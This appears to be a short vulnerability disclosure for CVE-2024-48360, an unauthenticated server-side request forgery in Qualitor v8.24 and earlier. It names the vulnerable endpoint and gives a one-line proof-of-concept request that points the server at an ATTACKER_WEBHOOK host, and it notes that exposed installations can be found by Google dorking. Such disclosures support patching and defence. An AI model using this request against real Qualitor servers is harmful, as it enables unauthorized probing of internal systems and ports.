# CVE-2024-48360 | Qualitor <= v8.24 Unauthenticated SSRF
## Description
Qualitor is a platform for business process management, and this system is present in various companies in Brazil that can be identified simply by using Google dorking.
Our team identified a vulnerability in the application susceptible to SSRF, which allows enumerate internal systems/ports.
## Proof of Concept (POC)
Qualitor v8.24 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /request/viewValidacao.php.
To exploit, just send a request to host.com/html/ad/adformmobile/request/viewValidacao.php?url=ATTACKER_WEBHOOK, you will receive the request from vulnerable server.
![image](https://github.com/user-attachments/assets/c7f3dd6f-759d-430c-a135-fdc01e802619)
### Researches
https://www.linkedin.com/in/xvinicius/
- OpenXP Research Team